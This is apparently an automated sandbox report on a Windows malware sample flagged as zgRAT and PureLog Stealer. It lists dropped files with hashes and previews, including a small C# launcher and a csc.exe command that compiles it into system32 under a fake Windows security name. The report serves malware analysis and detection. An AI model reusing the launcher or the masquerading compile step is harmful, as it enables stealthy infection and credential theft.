                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with very long lines (915), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):915
                                                                                              Entropy (8bit):5.90912122412152
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:jYXggSZcUECQPqZXGXWvqM9xz1F1X2JwU:jYtSZrEziXGbsz1F03
                                                                                              MD5:2FA963C6F8DF0F487E8722863213E5FB
                                                                                              SHA1:D1059E595DF000E3753FCDD58EC79A87400E5813
                                                                                              SHA-256:9FE7C03D36F2AF2419C4C9745DBDA84D2B38A805E9973FEBEA6512ED251304B6
                                                                                              SHA-512:C2177B49356A7315CCCE8F1E8B6A8983173BB8AAD5FE680CC994A2BD4AD1B38EDA3DF3AE6A7F66526811AF2124BD97B52C55C62EF60C8CCDCBFF68742838D176
                                                                                              Malicious:false
                                                                                              Preview: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
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):1920000
                                                                                              Entropy (8bit):7.535966089140223
                                                                                              Encrypted:false
                                                                                              SSDEEP:49152:x4LJMXaJ0ypWp8GkSVPa7aQ8b0U51h3r:x4LJWeK3kE9QY53r
                                                                                              MD5:68EF473852D3AEFD8E5E4F2E00B3DFAA
                                                                                              SHA1:3BA2594EC459D1C9152558EBDD9611427347A73E
                                                                                              SHA-256:F28D2482802E94CD02376A7153B318EF4FACC86CFC804AE117419C520520F8EC
                                                                                              SHA-512:8602717380A4AD4CA7CBCDBB2373E63FF8578D58E6324D43530B134C6D7005469FF89C45BAD773DA978D4263A56C51EFD331B09790F5708A563F26A513CAD3FF
                                                                                              Malicious:true
                                                                                              Yara Hits:
                                                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Public\AccountPictures\winlogon.exe, Author: Joe Security
                                                                                              Antivirus:
                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...WW9g.................D...........c... ........@.. ....................................@..................................b..K....... ............................................................................ ............... ..H............text...$C... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................c......H...........0...........4....z..Eb.......................................0..........(.... ........8........E....*...9...).......8%...(.... ....~....{u...9....& ....8....*(.... ....8....(.... ....~....{....9....& ....8........0.......... ........8........E............o...F...........8........~....(l...~....(p... ....?.... ....~....{....9....& ....8....~....9C... ....~....{....:....& ....8t...8t... ....~....{....:[...& ....8P......... ....8@...~....(d... .... .... ....s....~...
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):1396
                                                                                              Entropy (8bit):5.350961817021757
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                              MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                              SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                              SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                              SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                              Malicious:true
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                                                              Process:C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe
                                                                                              File Type:CSV text
                                                                                              Category:dropped
                                                                                              Size (bytes):847
                                                                                              Entropy (8bit):5.354334472896228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                              Process:C:\Program Files\Windows Defender\en-GB\conhost.exe
                                                                                              File Type:CSV text
                                                                                              Category:dropped
                                                                                              Size (bytes):847
                                                                                              Entropy (8bit):5.354334472896228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                              Process:C:\Users\Public\AccountPictures\winlogon.exe
                                                                                              File Type:CSV text
                                                                                              Category:dropped
                                                                                              Size (bytes):847
                                                                                              Entropy (8bit):5.354334472896228
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                              Malicious:false
                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:data
                                                                                              Category:modified
                                                                                              Size (bytes):64
                                                                                              Entropy (8bit):1.1940658735648508
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:NlllulJnp/p:NllU
                                                                                              MD5:BC6DB77EB243BF62DC31267706650173
                                                                                              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                              Malicious:false
                                                                                              Preview:@...e.................................X..............@..........
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                              Category:dropped
                                                                                              Size (bytes):396
                                                                                              Entropy (8bit):5.027815362919274
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LALiFkD:JNVQIbSfhV7TiFkMSfhWLAGFkD
                                                                                              MD5:35710B0D0ED56EF65BD2D72C6B8C0594
                                                                                              SHA1:BA6457E4B1F8F43EAC529A26139610CA8520F917
                                                                                              SHA-256:EBF0ABF2D6D6A132EE7828710F43BD81AC217257AE944462098CAAC412DE0449
                                                                                              SHA-512:825A7EBA6CF0A9B160008B1B33035F5147F4207C0ED8ECF6EE2D8E1115DD239CB5F8376BABE489DBD12DDF21C61B106D6D2C192B1D8D6BA67C2A1B8FBD82ECE4
                                                                                              Malicious:false
                                                                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"); } catch { } }).Start();. }.}.
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):250
                                                                                              Entropy (8bit):5.0969475734432095
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fGs:Hu7L//TRq79cQWfB
                                                                                              MD5:392AD6DE7E740840BEFFE95B89C7574E
                                                                                              SHA1:DFA0A7BB7FBE356D886C6372E0882A4A129A3108
                                                                                              SHA-256:5B8A79C9D90C907B9FEC8B59C1F36EC69E4675D306A798E27D3AC35E12E75059
                                                                                              SHA-512:E98F39EDA7568D6FE35308DF4C70F53B361DC9201E1DF98E04C02C64D7CA5E6200015E5C2C26126937F60C72542C102A5642EAD0AF63C8C477A3D9877CA17BCF
                                                                                              Malicious:true
                                                                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.0.cs"
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):750
                                                                                              Entropy (8bit):5.266793924200971
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:KJN/I/u7L//TRq79cQWfkKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWfkKax5DqBVKVrdFAMb
                                                                                              MD5:975A81E15C357205543CAA5793B3C638
                                                                                              SHA1:59BDCC0794AD3F68E54BD645E7DFF4D24573DD24
                                                                                              SHA-256:5AA5490D0B3C0D03E04D03002394F3902EDB8B0F5B637AE57C2C1EE2551E001F
                                                                                              SHA-512:76552FCA813D5EA46E5C40D26B74D911CAABFC9685A5B5E3B123D874EA9FAF613B303606B7ED76BF1B94B85CFA811CCC1EA1BC681CE67F57D136B29DBA43207E
                                                                                              Malicious:false
                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):106496
                                                                                              Entropy (8bit):1.1358696453229276
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):25
                                                                                              Entropy (8bit):4.243856189774724
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:wZRpl7:gt7
                                                                                              MD5:BA16BE96B86AFA09A37E32788454567A
                                                                                              SHA1:4B6E14DF48158984C949CC91AB2A212446950513
                                                                                              SHA-256:3A49D7418DA93CE97597842302916F6AAEE1072923940CAD6BAB270530EE509A
                                                                                              SHA-512:1E6AEE9A8BD22567E3049DBB59E6DC363323626B06C5F2BAB10B1416226F2437DB8678B3A23F3EBAAF77C19EA7F01690951920995BDDD0782F7BC59D8D7D9C68
                                                                                              Malicious:false
                                                                                              Preview:0z991UazooL7srtCt4LjHiNKu
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.5707520969659783
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.5707520969659783
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):0.5712781801655107
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Mon Dec 9 16:51:39 2024, 1st section name ".debug$S"
                                                                                              Category:dropped
                                                                                              Size (bytes):1948
                                                                                              Entropy (8bit):4.560366702154968
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:HC9G9E1XOrMfH1wKEsmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:nrY2KhmyluOulajfqXSfbNtmhY2Z
                                                                                              MD5:D4E859E2DEACEC6450BD762A8EC7B0C8
                                                                                              SHA1:9310AF5B399E661472E1CB3F984E09DC42A21196
                                                                                              SHA-256:A49B3F9A30B53001B5298370AE43A7154CBD9D28C6EB51A0066B866CB09A6217
                                                                                              SHA-512:49FB03123911082367E7D97AEA5AE5598CDF6CB5C7B225B06B990D8C5C26E5ACAD6356A53253F2C8724EC5893294CD3021FA7FC61F83C8DE611857431F80733D
                                                                                              Malicious:false
                                                                                              Preview:L.... Wg.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP..................r.av..t.y..............3.......C:\Users\user\AppData\Local\Temp\RES39B.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                              Category:dropped
                                                                                              Size (bytes):40960
                                                                                              Entropy (8bit):0.8553638852307782
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              File Type:ASCII text, with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):25
                                                                                              Entropy (8bit):4.403856189774723
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:zn3YRSQ21:L38Sj1
                                                                                              MD5:798746746207809C61D7DC5436125F16
                                                                                              SHA1:679DFADA65F78B6E9A4703C8062BD16561DEF024
                                                                                              SHA-256:BC9B080A051AF7DB1221173C61F93920F3CD21CA513D57174B43289C5FE8CAEC
